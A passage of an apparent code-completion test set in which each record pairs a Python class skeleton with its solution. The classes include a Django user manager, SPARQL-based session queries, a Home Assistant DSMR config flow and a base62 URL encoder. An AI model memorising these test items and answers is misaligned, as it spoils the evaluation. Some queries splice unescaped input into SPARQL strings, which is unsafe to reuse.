password=None):\n \"\"\"Creates and saves a User with the given email, date of birth and password.\"\"\"\n <|body_0|>\n\n def create_superuser(self, username, email, password):\n \"\"\"Creates and saves a superuser with the given email, date of birth and password.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not email:\n raise ValueError('Users must have an email address')\n user = self.model(username=username, email=self.normalize_email(email))\n user.set_password(password)\n user.save(using=self._db)\n return user\n<|end_body_0|>\n\n<|body_start_1|>\n user = self.create_user(username, email, password=password)\n user.is_admin = True\n user.is_staff = True\n user.save(using=self._db)\n return user\n<|end_body_1|>\n", "revision_id": "8b33a29e60d84853f8c1e92d7a4ca88c6ee349b4", "skeleton": "<|skeleton|>\nclass MyUserManager:\n\n def create_user(self, username, email, password=None):\n \"\"\"Creates and saves a User with the given email, date of birth and password.\"\"\"\n <|body_0|>\n\n def create_superuser(self, username, email, password):\n \"\"\"Creates and saves a superuser with the given email, date of birth and password.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MyUserManager:\n def create_user(self, username, email, password=None):\n \"\"\"Creates and saves a User with the given email, date of birth and password.\"\"\"\n if not email:\n raise ValueError('Users must have an email address')\n user = self.model(username=username, email=self.normalize_email(email))\n user.set_password(password)\n user.save(using=self._db)\n return user\n\n def create_superuser(self, username, email, password):\n \"\"\"Creates and saves a superuser with the given email, date of birth and password.\"\"\"\n user = self.create_user(username, email, password=password)\n user.is_admin = True\n user.is_staff = True\n user.save(using=self._db)\n return user\n", "source": "the_stack_v2_python_sparse", "source_path": "accounts/models.py", "source_repo": "falbellaihi1/BST", "split": "test", "star_events_count": 0} {"blob_id": "6dd2f875f220e3008c6bff830e65360b19e64c55", "bodies": ["sparql_results = self.query('\\n select distinct ?rs ?session ?name ?number ?pid ?sitename\\n where {\\n \\n ?rs rdf:type austalk:RecordedSession .\\n ?rs olac:speaker ?participant .\\n \\n ?participant austalk:id ?pid .\\n ?participant austalk:recording_site ?site .\\n ?site rdfs:label ?sitename .\\n \\n ?rs austalk:prototype ?session .\\n ?session austalk:name ?name .\\n ?session austalk:id ?number .\\n }\\n ORDER BY ?name')\nresults = []\nfor result in sparql_results['results']['bindings']:\n results.append(Session(client=self.client, identifier=result['rs']['value'], prototype=result['session']['value'], name=result['name']['value'], number=result['number']['value'], site=result['sitename']['value'], participantId=result['pid']['value']))\nreturn results", "sparql_results = self.query('\\n select distinct ?rs ?session ?name ?number ?pid ?sitename\\n where {\\n BIND (<%s> AS ?participant)\\n \\n ?rs rdf:type austalk:RecordedSession .\\n ?rs olac:speaker ?participant .\\n \\n ?participant austalk:id ?pid .\\n ?participant austalk:recording_site ?site .\\n ?site rdfs:label ?sitename .\\n \\n ?rs austalk:prototype ?session .\\n ?session austalk:name ?name .\\n ?session austalk:id ?number .\\n }\\n ORDER BY ?name' % participant.identifier)\nresults = []\nfor result in sparql_results['results']['bindings']:\n results.append(Session(client=self.client, identifier=result['rs']['value'], prototype=result['session']['value'], name=result['name']['value'], number=result['number']['value'], site=result['sitename']['value'], participantId=result['pid']['value']))\nreturn results", "sparql_results = self.query('\\n select distinct ?rs ?session ?name ?number ?pid\\n WHERE {\\n ?rs rdf:type austalk:RecordedSession .\\n ?rs olac:speaker ?participant .\\n \\n ?participant austalk:id ?pid .\\n ?participant austalk:recording_site ?site .\\n ?site rdfs:label \"%s\" .\\n \\n ?rs austalk:prototype ?session .\\n ?session austalk:name ?name .\\n ?session austalk:id ?number .\\n \\n }\\n ORDER BY ?name' % label)\nresults = []\nfor result in sparql_results['results']['bindings']:\n results.append(Session(client=self.client, identifier=result['rs']['value'], prototype=result['session']['value'], name=result['name']['value'], number=result['number']['value'], participantId=result['pid']['value']))\nreturn results"], "bodies_text": "<|body_start_0|>\n sparql_results = self.query('\\n select distinct ?rs ?session ?name ?number ?pid ?sitename\\n where {\\n \\n ?rs rdf:type austalk:RecordedSession .\\n ?rs olac:speaker ?participant .\\n \\n ?participant austalk:id ?pid .\\n ?participant austalk:recording_site ?site .\\n ?site rdfs:label ?sitename .\\n \\n ?rs austalk:prototype ?session .\\n ?session austalk:name ?name .\\n ?session austalk:id ?number .\\n }\\n ORDER BY ?name')\n results = []\n for result in sparql_results['results']['bindings']:\n results.append(Session(client=self.client, identifier=result['rs']['value'], prototype=result['session']['value'], name=result['name']['value'], number=result['number']['value'], site=result['sitename']['value'], participantId=result['pid']['value']))\n return results\n<|end_body_0|>\n\n<|body_start_1|>\n sparql_results = self.query('\\n select distinct ?rs ?session ?name ?number ?pid ?sitename\\n where {\\n BIND (<%s> AS ?participant)\\n \\n ?rs rdf:type austalk:RecordedSession .\\n ?rs olac:speaker ?participant .\\n \\n ?participant austalk:id ?pid .\\n ?participant austalk:recording_site ?site .\\n ?site rdfs:label ?sitename .\\n \\n ?rs austalk:prototype ?session .\\n ?session austalk:name ?name .\\n ?session austalk:id ?number .\\n }\\n ORDER BY ?name' % participant.identifier)\n results = []\n for result in sparql_results['results']['bindings']:\n results.append(Session(client=self.client, identifier=result['rs']['value'], prototype=result['session']['value'], name=result['name']['value'], number=result['number']['value'], site=result['sitename']['value'], participantId=result['pid']['value']))\n return results\n<|end_body_1|>\n\n<|body_start_2|>\n sparql_results = self.query('\\n select distinct ?rs ?session ?name ?number ?pid\\n WHERE {\\n ?rs rdf:type austalk:RecordedSession .\\n ?rs olac:speaker ?participant .\\n \\n ?participant austalk:id ?pid .\\n ?participant austalk:recording_site ?site .\\n ?site rdfs:label \"%s\" .\\n \\n ?rs austalk:prototype ?session .\\n ?session austalk:name ?name .\\n ?session austalk:id ?number .\\n \\n }\\n ORDER BY ?name' % label)\n results = []\n for result in sparql_results['results']['bindings']:\n results.append(Session(client=self.client, identifier=result['rs']['value'], prototype=result['session']['value'], name=result['name']['value'], number=result['number']['value'], participantId=result['pid']['value']))\n return results\n<|end_body_2|>\n", "class_docstring": "A session is a logical representation of the actual recording session which takes place at a particular location.", "class_name": "SessionManager", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SessionManager:\n \"\"\"A session is a logical representation of the actual recording session which takes place at a particular location.\"\"\"\n\n def all(self):\n \"\"\"Returns all the session names\"\"\"\n <|body_0|>\n\n def filter_by_participant(self, participant):\n \"\"\"Returns all the session names for a participant\"\"\"\n <|body_1|>\n\n def filter_by_site(self, label):\n \"\"\"Returns all the session names for a site identified by site label\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n sparql_results = self.query('\\n select distinct ?rs ?session ?name ?number ?pid ?sitename\\n where {\\n \\n ?rs rdf:type austalk:RecordedSession .\\n ?rs olac:speaker ?participant .\\n \\n ?participant austalk:id ?pid .\\n ?participant austalk:recording_site ?site .\\n ?site rdfs:label ?sitename .\\n \\n ?rs austalk:prototype ?session .\\n ?session austalk:name ?name .\\n ?session austalk:id ?number .\\n }\\n ORDER BY ?name')\n results = []\n for result in sparql_results['results']['bindings']:\n results.append(Session(client=self.client, identifier=result['rs']['value'], prototype=result['session']['value'], name=result['name']['value'], number=result['number']['value'], site=result['sitename']['value'], participantId=result['pid']['value']))\n return results\n<|end_body_0|>\n\n<|body_start_1|>\n sparql_results = self.query('\\n select distinct ?rs ?session ?name ?number ?pid ?sitename\\n where {\\n BIND (<%s> AS ?participant)\\n \\n ?rs rdf:type austalk:RecordedSession .\\n ?rs olac:speaker ?participant .\\n \\n ?participant austalk:id ?pid .\\n ?participant austalk:recording_site ?site .\\n ?site rdfs:label ?sitename .\\n \\n ?rs austalk:prototype ?session .\\n ?session austalk:name ?name .\\n ?session austalk:id ?number .\\n }\\n ORDER BY ?name' % participant.identifier)\n results = []\n for result in sparql_results['results']['bindings']:\n results.append(Session(client=self.client, identifier=result['rs']['value'], prototype=result['session']['value'], name=result['name']['value'], number=result['number']['value'], site=result['sitename']['value'], participantId=result['pid']['value']))\n return results\n<|end_body_1|>\n\n<|body_start_2|>\n sparql_results = self.query('\\n select distinct ?rs ?session ?name ?number ?pid\\n WHERE {\\n ?rs rdf:type austalk:RecordedSession .\\n ?rs olac:speaker ?participant .\\n \\n ?participant austalk:id ?pid .\\n ?participant austalk:recording_site ?site .\\n ?site rdfs:label \"%s\" .\\n \\n ?rs austalk:prototype ?session .\\n ?session austalk:name ?name .\\n ?session austalk:id ?number .\\n \\n }\\n ORDER BY ?name' % label)\n results = []\n for result in sparql_results['results']['bindings']:\n results.append(Session(client=self.client, identifier=result['rs']['value'], prototype=result['session']['value'], name=result['name']['value'], number=result['number']['value'], participantId=result['pid']['value']))\n return results\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000421", "length_bytes": 5176, "license_type": "no_license", "methods": [{"docstring": "Returns all the session names", "name": "all", "signature": "def all(self)"}, {"docstring": "Returns all the session names for a participant", "name": "filter_by_participant", "signature": "def filter_by_participant(self, participant)"}, {"docstring": "Returns all the session names for a site identified by site label", "name": "filter_by_site", "signature": "def filter_by_site(self, label)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_005626", "prompt": "Implement the Python class `SessionManager` described below.\n\nClass description:\nA session is a logical representation of the actual recording session which takes place at a particular location.\n\nMethod signatures and docstrings:\n- def all(self): Returns all the session names\n- def filter_by_participant(self, participant): Returns all the session names for a participant\n- def filter_by_site(self, label): Returns all the session names for a site identified by site label", "prompted_full_text": "Implement the Python class `SessionManager` described below.\n\nClass description:\nA session is a logical representation of the actual recording session which takes place at a particular location.\n\nMethod signatures and docstrings:\n- def all(self): Returns all the session names\n- def filter_by_participant(self, participant): Returns all the session names for a participant\n- def filter_by_site(self, label): Returns all the session names for a site identified by site label\n\n<|skeleton|>\nclass SessionManager:\n \"\"\"A session is a logical representation of the actual recording session which takes place at a particular location.\"\"\"\n\n def all(self):\n \"\"\"Returns all the session names\"\"\"\n <|body_0|>\n\n def filter_by_participant(self, participant):\n \"\"\"Returns all the session names for a participant\"\"\"\n <|body_1|>\n\n def filter_by_site(self, label):\n \"\"\"Returns all the session names for a site identified by site label\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n sparql_results = self.query('\\n select distinct ?rs ?session ?name ?number ?pid ?sitename\\n where {\\n \\n ?rs rdf:type austalk:RecordedSession .\\n ?rs olac:speaker ?participant .\\n \\n ?participant austalk:id ?pid .\\n ?participant austalk:recording_site ?site .\\n ?site rdfs:label ?sitename .\\n \\n ?rs austalk:prototype ?session .\\n ?session austalk:name ?name .\\n ?session austalk:id ?number .\\n }\\n ORDER BY ?name')\n results = []\n for result in sparql_results['results']['bindings']:\n results.append(Session(client=self.client, identifier=result['rs']['value'], prototype=result['session']['value'], name=result['name']['value'], number=result['number']['value'], site=result['sitename']['value'], participantId=result['pid']['value']))\n return results\n<|end_body_0|>\n\n<|body_start_1|>\n sparql_results = self.query('\\n select distinct ?rs ?session ?name ?number ?pid ?sitename\\n where {\\n BIND (<%s> AS ?participant)\\n \\n ?rs rdf:type austalk:RecordedSession .\\n ?rs olac:speaker ?participant .\\n \\n ?participant austalk:id ?pid .\\n ?participant austalk:recording_site ?site .\\n ?site rdfs:label ?sitename .\\n \\n ?rs austalk:prototype ?session .\\n ?session austalk:name ?name .\\n ?session austalk:id ?number .\\n }\\n ORDER BY ?name' % participant.identifier)\n results = []\n for result in sparql_results['results']['bindings']:\n results.append(Session(client=self.client, identifier=result['rs']['value'], prototype=result['session']['value'], name=result['name']['value'], number=result['number']['value'], site=result['sitename']['value'], participantId=result['pid']['value']))\n return results\n<|end_body_1|>\n\n<|body_start_2|>\n sparql_results = self.query('\\n select distinct ?rs ?session ?name ?number ?pid\\n WHERE {\\n ?rs rdf:type austalk:RecordedSession .\\n ?rs olac:speaker ?participant .\\n \\n ?participant austalk:id ?pid .\\n ?participant austalk:recording_site ?site .\\n ?site rdfs:label \"%s\" .\\n \\n ?rs austalk:prototype ?session .\\n ?session austalk:name ?name .\\n ?session austalk:id ?number .\\n \\n }\\n ORDER BY ?name' % label)\n results = []\n for result in sparql_results['results']['bindings']:\n results.append(Session(client=self.client, identifier=result['rs']['value'], prototype=result['session']['value'], name=result['name']['value'], number=result['number']['value'], participantId=result['pid']['value']))\n return results\n<|end_body_2|>\n", "revision_id": "88000a79f0a18c92de0092814de3dbb2409f5515", "skeleton": "<|skeleton|>\nclass SessionManager:\n \"\"\"A session is a logical representation of the actual recording session which takes place at a particular location.\"\"\"\n\n def all(self):\n \"\"\"Returns all the session names\"\"\"\n <|body_0|>\n\n def filter_by_participant(self, participant):\n \"\"\"Returns all the session names for a participant\"\"\"\n <|body_1|>\n\n def filter_by_site(self, label):\n \"\"\"Returns all the session names for a site identified by site label\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SessionManager:\n \"\"\"A session is a logical representation of the actual recording session which takes place at a particular location.\"\"\"\n\n def all(self):\n \"\"\"Returns all the session names\"\"\"\n sparql_results = self.query('\\n select distinct ?rs ?session ?name ?number ?pid ?sitename\\n where {\\n \\n ?rs rdf:type austalk:RecordedSession .\\n ?rs olac:speaker ?participant .\\n \\n ?participant austalk:id ?pid .\\n ?participant austalk:recording_site ?site .\\n ?site rdfs:label ?sitename .\\n \\n ?rs austalk:prototype ?session .\\n ?session austalk:name ?name .\\n ?session austalk:id ?number .\\n }\\n ORDER BY ?name')\n results = []\n for result in sparql_results['results']['bindings']:\n results.append(Session(client=self.client, identifier=result['rs']['value'], prototype=result['session']['value'], name=result['name']['value'], number=result['number']['value'], site=result['sitename']['value'], participantId=result['pid']['value']))\n return results\n\n def filter_by_participant(self, participant):\n \"\"\"Returns all the session names for a participant\"\"\"\n sparql_results = self.query('\\n select distinct ?rs ?session ?name ?number ?pid ?sitename\\n where {\\n BIND (<%s> AS ?participant)\\n \\n ?rs rdf:type austalk:RecordedSession .\\n ?rs olac:speaker ?participant .\\n \\n ?participant austalk:id ?pid .\\n ?participant austalk:recording_site ?site .\\n ?site rdfs:label ?sitename .\\n \\n ?rs austalk:prototype ?session .\\n ?session austalk:name ?name .\\n ?session austalk:id ?number .\\n }\\n ORDER BY ?name' % participant.identifier)\n results = []\n for result in sparql_results['results']['bindings']:\n results.append(Session(client=self.client, identifier=result['rs']['value'], prototype=result['session']['value'], name=result['name']['value'], number=result['number']['value'], site=result['sitename']['value'], participantId=result['pid']['value']))\n return results\n\n def filter_by_site(self, label):\n \"\"\"Returns all the session names for a site identified by site label\"\"\"\n sparql_results = self.query('\\n select distinct ?rs ?session ?name ?number ?pid\\n WHERE {\\n ?rs rdf:type austalk:RecordedSession .\\n ?rs olac:speaker ?participant .\\n \\n ?participant austalk:id ?pid .\\n ?participant austalk:recording_site ?site .\\n ?site rdfs:label \"%s\" .\\n \\n ?rs austalk:prototype ?session .\\n ?session austalk:name ?name .\\n ?session austalk:id ?number .\\n \\n }\\n ORDER BY ?name' % label)\n results = []\n for result in sparql_results['results']['bindings']:\n results.append(Session(client=self.client, identifier=result['rs']['value'], prototype=result['session']['value'], name=result['name']['value'], number=result['number']['value'], participantId=result['pid']['value']))\n return results\n", "source": "the_stack_v2_python_sparse", "source_path": "browse/modelspackage/sessions.py", "source_repo": "Alveo/smallasc", "split": "test", "star_events_count": 0} {"blob_id": "0f645ee91782f286c68d418dd060752e7354a76d", "bodies": ["for entry in self._async_current_entries():\n if entry.data.get(CONF_HOST) == host and entry.data[CONF_PORT] == port:\n if updates is not None:\n changed = self.hass.config_entries.async_update_entry(entry, data={**entry.data, **updates})\n if changed and reload_on_update and (entry.state in (config_entries.ENTRY_STATE_LOADED, config_entries.ENTRY_STATE_SETUP_RETRY)):\n self.hass.async_create_task(self.hass.config_entries.async_reload(entry.entry_id))\n return self.async_abort(reason='already_configured')\nreturn None", "host = import_config.get(CONF_HOST)\nport = import_config[CONF_PORT]\nstatus = self._abort_if_host_port_configured(port, host, import_config)\nif status is not None:\n return status\ntry:\n info = await _validate_dsmr_connection(self.hass, import_config)\nexcept CannotConnect:\n return self.async_abort(reason='cannot_connect')\nexcept CannotCommunicate:\n return self.async_abort(reason='cannot_communicate')\nif host is not None:\n name = f'{host}:{port}'\nelse:\n name = port\ndata = {**import_config, **info}\nawait self.async_set_unique_id(info[CONF_SERIAL_ID])\nself._abort_if_unique_id_configured(data)\nreturn self.async_create_entry(title=name, data=data)"], "bodies_text": "<|body_start_0|>\n for entry in self._async_current_entries():\n if entry.data.get(CONF_HOST) == host and entry.data[CONF_PORT] == port:\n if updates is not None:\n changed = self.hass.config_entries.async_update_entry(entry, data={**entry.data, **updates})\n if changed and reload_on_update and (entry.state in (config_entries.ENTRY_STATE_LOADED, config_entries.ENTRY_STATE_SETUP_RETRY)):\n self.hass.async_create_task(self.hass.config_entries.async_reload(entry.entry_id))\n return self.async_abort(reason='already_configured')\n return None\n<|end_body_0|>\n\n<|body_start_1|>\n host = import_config.get(CONF_HOST)\n port = import_config[CONF_PORT]\n status = self._abort_if_host_port_configured(port, host, import_config)\n if status is not None:\n return status\n try:\n info = await _validate_dsmr_connection(self.hass, import_config)\n except CannotConnect:\n return self.async_abort(reason='cannot_connect')\n except CannotCommunicate:\n return self.async_abort(reason='cannot_communicate')\n if host is not None:\n name = f'{host}:{port}'\n else:\n name = port\n data = {**import_config, **info}\n await self.async_set_unique_id(info[CONF_SERIAL_ID])\n self._abort_if_unique_id_configured(data)\n return self.async_create_entry(title=name, data=data)\n<|end_body_1|>\n", "class_docstring": "Handle a config flow for DSMR.", "class_name": "DSMRFlowHandler", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DSMRFlowHandler:\n \"\"\"Handle a config flow for DSMR.\"\"\"\n\n def _abort_if_host_port_configured(self, port: str, host: str=None, updates: Optional[Dict[Any, Any]]=None, reload_on_update: bool=True):\n \"\"\"Test if host and port are already configured.\"\"\"\n <|body_0|>\n\n async def async_step_import(self, import_config=None):\n \"\"\"Handle the initial step.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n for entry in self._async_current_entries():\n if entry.data.get(CONF_HOST) == host and entry.data[CONF_PORT] == port:\n if updates is not None:\n changed = self.hass.config_entries.async_update_entry(entry, data={**entry.data, **updates})\n if changed and reload_on_update and (entry.state in (config_entries.ENTRY_STATE_LOADED, config_entries.ENTRY_STATE_SETUP_RETRY)):\n self.hass.async_create_task(self.hass.config_entries.async_reload(entry.entry_id))\n return self.async_abort(reason='already_configured')\n return None\n<|end_body_0|>\n\n<|body_start_1|>\n host = import_config.get(CONF_HOST)\n port = import_config[CONF_PORT]\n status = self._abort_if_host_port_configured(port, host, import_config)\n if status is not None:\n return status\n try:\n info = await _validate_dsmr_connection(self.hass, import_config)\n except CannotConnect:\n return self.async_abort(reason='cannot_connect')\n except CannotCommunicate:\n return self.async_abort(reason='cannot_communicate')\n if host is not None:\n name = f'{host}:{port}'\n else:\n name = port\n data = {**import_config, **info}\n await self.async_set_unique_id(info[CONF_SERIAL_ID])\n self._abort_if_unique_id_configured(data)\n return self.async_create_entry(title=name, data=data)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000422", "length_bytes": 6055, "license_type": "permissive", "methods": [{"docstring": "Test if host and port are already configured.", "name": "_abort_if_host_port_configured", "signature": "def _abort_if_host_port_configured(self, port: str, host: str=None, updates: Optional[Dict[Any, Any]]=None, reload_on_update: bool=True)"}, {"docstring": "Handle the initial step.", "name": "async_step_import", "signature": "async def async_step_import(self, import_config=None)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001695", "prompt": "Implement the Python class `DSMRFlowHandler` described below.\n\nClass description:\nHandle a config flow for DSMR.\n\nMethod signatures and docstrings:\n- def _abort_if_host_port_configured(self, port: str, host: str=None, updates: Optional[Dict[Any, Any]]=None, reload_on_update: bool=True): Test if host and port are already configured.\n- async def async_step_import(self, import_config=None): Handle the initial step.", "prompted_full_text": "Implement the Python class `DSMRFlowHandler` described below.\n\nClass description:\nHandle a config flow for DSMR.\n\nMethod signatures and docstrings:\n- def _abort_if_host_port_configured(self, port: str, host: str=None, updates: Optional[Dict[Any, Any]]=None, reload_on_update: bool=True): Test if host and port are already configured.\n- async def async_step_import(self, import_config=None): Handle the initial step.\n\n<|skeleton|>\nclass DSMRFlowHandler:\n \"\"\"Handle a config flow for DSMR.\"\"\"\n\n def _abort_if_host_port_configured(self, port: str, host: str=None, updates: Optional[Dict[Any, Any]]=None, reload_on_update: bool=True):\n \"\"\"Test if host and port are already configured.\"\"\"\n <|body_0|>\n\n async def async_step_import(self, import_config=None):\n \"\"\"Handle the initial step.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n for entry in self._async_current_entries():\n if entry.data.get(CONF_HOST) == host and entry.data[CONF_PORT] == port:\n if updates is not None:\n changed = self.hass.config_entries.async_update_entry(entry, data={**entry.data, **updates})\n if changed and reload_on_update and (entry.state in (config_entries.ENTRY_STATE_LOADED, config_entries.ENTRY_STATE_SETUP_RETRY)):\n self.hass.async_create_task(self.hass.config_entries.async_reload(entry.entry_id))\n return self.async_abort(reason='already_configured')\n return None\n<|end_body_0|>\n\n<|body_start_1|>\n host = import_config.get(CONF_HOST)\n port = import_config[CONF_PORT]\n status = self._abort_if_host_port_configured(port, host, import_config)\n if status is not None:\n return status\n try:\n info = await _validate_dsmr_connection(self.hass, import_config)\n except CannotConnect:\n return self.async_abort(reason='cannot_connect')\n except CannotCommunicate:\n return self.async_abort(reason='cannot_communicate')\n if host is not None:\n name = f'{host}:{port}'\n else:\n name = port\n data = {**import_config, **info}\n await self.async_set_unique_id(info[CONF_SERIAL_ID])\n self._abort_if_unique_id_configured(data)\n return self.async_create_entry(title=name, data=data)\n<|end_body_1|>\n", "revision_id": "ed4ab403deaed9e8c95e0db728477fcb012bf4fa", "skeleton": "<|skeleton|>\nclass DSMRFlowHandler:\n \"\"\"Handle a config flow for DSMR.\"\"\"\n\n def _abort_if_host_port_configured(self, port: str, host: str=None, updates: Optional[Dict[Any, Any]]=None, reload_on_update: bool=True):\n \"\"\"Test if host and port are already configured.\"\"\"\n <|body_0|>\n\n async def async_step_import(self, import_config=None):\n \"\"\"Handle the initial step.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DSMRFlowHandler:\n \"\"\"Handle a config flow for DSMR.\"\"\"\n\n def _abort_if_host_port_configured(self, port: str, host: str=None, updates: Optional[Dict[Any, Any]]=None, reload_on_update: bool=True):\n \"\"\"Test if host and port are already configured.\"\"\"\n for entry in self._async_current_entries():\n if entry.data.get(CONF_HOST) == host and entry.data[CONF_PORT] == port:\n if updates is not None:\n changed = self.hass.config_entries.async_update_entry(entry, data={**entry.data, **updates})\n if changed and reload_on_update and (entry.state in (config_entries.ENTRY_STATE_LOADED, config_entries.ENTRY_STATE_SETUP_RETRY)):\n self.hass.async_create_task(self.hass.config_entries.async_reload(entry.entry_id))\n return self.async_abort(reason='already_configured')\n return None\n\n async def async_step_import(self, import_config=None):\n \"\"\"Handle the initial step.\"\"\"\n host = import_config.get(CONF_HOST)\n port = import_config[CONF_PORT]\n status = self._abort_if_host_port_configured(port, host, import_config)\n if status is not None:\n return status\n try:\n info = await _validate_dsmr_connection(self.hass, import_config)\n except CannotConnect:\n return self.async_abort(reason='cannot_connect')\n except CannotCommunicate:\n return self.async_abort(reason='cannot_communicate')\n if host is not None:\n name = f'{host}:{port}'\n else:\n name = port\n data = {**import_config, **info}\n await self.async_set_unique_id(info[CONF_SERIAL_ID])\n self._abort_if_unique_id_configured(data)\n return self.async_create_entry(title=name, data=data)\n", "source": "the_stack_v2_python_sparse", "source_path": "homeassistant/components/dsmr/config_flow.py", "source_repo": "tchellomello/home-assistant", "split": "test", "star_events_count": 8} {"blob_id": "53876b10f480090c654039d6966eed9867e3ff91", "bodies": ["if num == 0:\n return alphabet[0]\narr = []\narr_append = arr.append\n_divmod = divmod\nbase = len(alphabet)\nwhile num:\n num, rem = _divmod(num, base)\n arr_append(alphabet[rem])\narr.reverse()\nreturn ''.join(arr)", "base = len(alphabet)\nstrlen = len(string)\nnum = 0\nidx = 0\nfor char in string:\n power = strlen - (idx + 1)\n num += alphabet.index(char) * base ** power\n idx += 1\nreturn num"], "bodies_text": "<|body_start_0|>\n if num == 0:\n return alphabet[0]\n arr = []\n arr_append = arr.append\n _divmod = divmod\n base = len(alphabet)\n while num:\n num, rem = _divmod(num, base)\n arr_append(alphabet[rem])\n arr.reverse()\n return ''.join(arr)\n<|end_body_0|>\n\n<|body_start_1|>\n base = len(alphabet)\n strlen = len(string)\n num = 0\n idx = 0\n for char in string:\n power = strlen - (idx + 1)\n num += alphabet.index(char) * base ** power\n idx += 1\n return num\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def idToShortURL(self, num: int, alphabet: str=BASE62) -> str:\n \"\"\"Encode a positive number into Base X and return the string. Arguments: - `num`: The number to encode - `alphabet`: The alphabet to use for encoding\"\"\"\n <|body_0|>\n\n def shortURLToId(self, string: str, alphabet: str=BASE62) -> int:\n \"\"\"Decode a Base X encoded string into the number Arguments: - `string`: The encoded string - `alphabet`: The alphabet to use for decoding\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if num == 0:\n return alphabet[0]\n arr = []\n arr_append = arr.append\n _divmod = divmod\n base = len(alphabet)\n while num:\n num, rem = _divmod(num, base)\n arr_append(alphabet[rem])\n arr.reverse()\n return ''.join(arr)\n<|end_body_0|>\n\n<|body_start_1|>\n base = len(alphabet)\n strlen = len(string)\n num = 0\n idx = 0\n for char in string:\n power = strlen - (idx + 1)\n num += alphabet.index(char) * base ** power\n idx += 1\n return num\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000423", "length_bytes": 5356, "license_type": "no_license", "methods": [{"docstring": "Encode a positive number into Base X and return the string. Arguments: - `num`: The number to encode - `alphabet`: The alphabet to use for encoding", "name": "idToShortURL", "signature": "def idToShortURL(self, num: int, alphabet: str=BASE62) -> str"}, {"docstring": "Decode a Base X encoded string into the number Arguments: - `string`: The encoded string - `alphabet`: The alphabet to use for decoding", "name": "shortURLToId", "signature": "def shortURLToId(self, string: str, alphabet: str=BASE62) -> int"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def idToShortURL(self, num: int, alphabet: str=BASE62) -> str: Encode a positive number into Base X and return the string. Arguments: - `num`: The number to encode - `alphabet`: The alphabet to use for encoding\n- def shortURLToId(self, string: str, alphabet: str=BASE62) -> int: Decode a Base X encoded string into the number Arguments: - `string`: The encoded string - `alphabet`: The alphabet to use for decoding", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def idToShortURL(self, num: int, alphabet: str=BASE62) -> str: Encode a positive number into Base X and return the string. Arguments: - `num`: The number to encode - `alphabet`: The alphabet to use for encoding\n- def shortURLToId(self, string: str, alphabet: str=BASE62) -> int: Decode a Base X encoded string into the number Arguments: - `string`: The encoded string - `alphabet`: The alphabet to use for decoding\n\n<|skeleton|>\nclass Solution:\n\n def idToShortURL(self, num: int, alphabet: str=BASE62) -> str:\n \"\"\"Encode a positive number into Base X and return the string. Arguments: - `num`: The number to encode - `alphabet`: The alphabet to use for encoding\"\"\"\n <|body_0|>\n\n def shortURLToId(self, string: str, alphabet: str=BASE62) -> int:\n \"\"\"Decode a Base X encoded string into the number Arguments: - `string`: The encoded string - `alphabet`: The alphabet to use for decoding\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if num == 0:\n return alphabet[0]\n arr = []\n arr_append = arr.append\n _divmod = divmod\n base = len(alphabet)\n while num:\n num, rem = _divmod(num, base)\n arr_append(alphabet[rem])\n arr.reverse()\n return ''.join(arr)\n<|end_body_0|>\n\n<|body_start_1|>\n base = len(alphabet)\n strlen = len(string)\n num = 0\n idx = 0\n for char in string:\n power = strlen - (idx + 1)\n num += alphabet.index(char) * base ** power\n idx += 1\n return num\n<|end_body_1|>\n", "revision_id": "f2621cd76822a922c49b60f32931f26cce1c571d", "skeleton": "<|skeleton|>\nclass Solution:\n\n def idToShortURL(self, num: int, alphabet: str=BASE62) -> str:\n \"\"\"Encode a positive number into Base X and return the string. Arguments: - `num`: The number to encode - `alphabet`: The alphabet to use for encoding\"\"\"\n <|body_0|>\n\n def shortURLToId(self, string: str, alphabet: str=BASE62) -> int:\n \"\"\"Decode a Base X encoded string into the number Arguments: - `string`: The encoded string - `alphabet`: The alphabet to use for decoding\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def idToShortURL(self, num: int, alphabet: str=BASE62) -> str:\n \"\"\"Encode a positive number into Base X and return the string. Arguments: - `num`: The number to encode - `alphabet`: The alphabet to use for encoding\"\"\"\n if num == 0:\n return alphabet[0]\n arr = []\n arr_append = arr.append\n _divmod = divmod\n base = len(alphabet)\n while num:\n num, rem = _divmod(num, base)\n arr_append(alphabet[rem])\n arr.reverse()\n return ''.join(arr)\n\n def shortURLToId(self, string: str, alphabet: str=BASE62) -> int:\n \"\"\"Decode a Base X encoded string into the number Arguments: 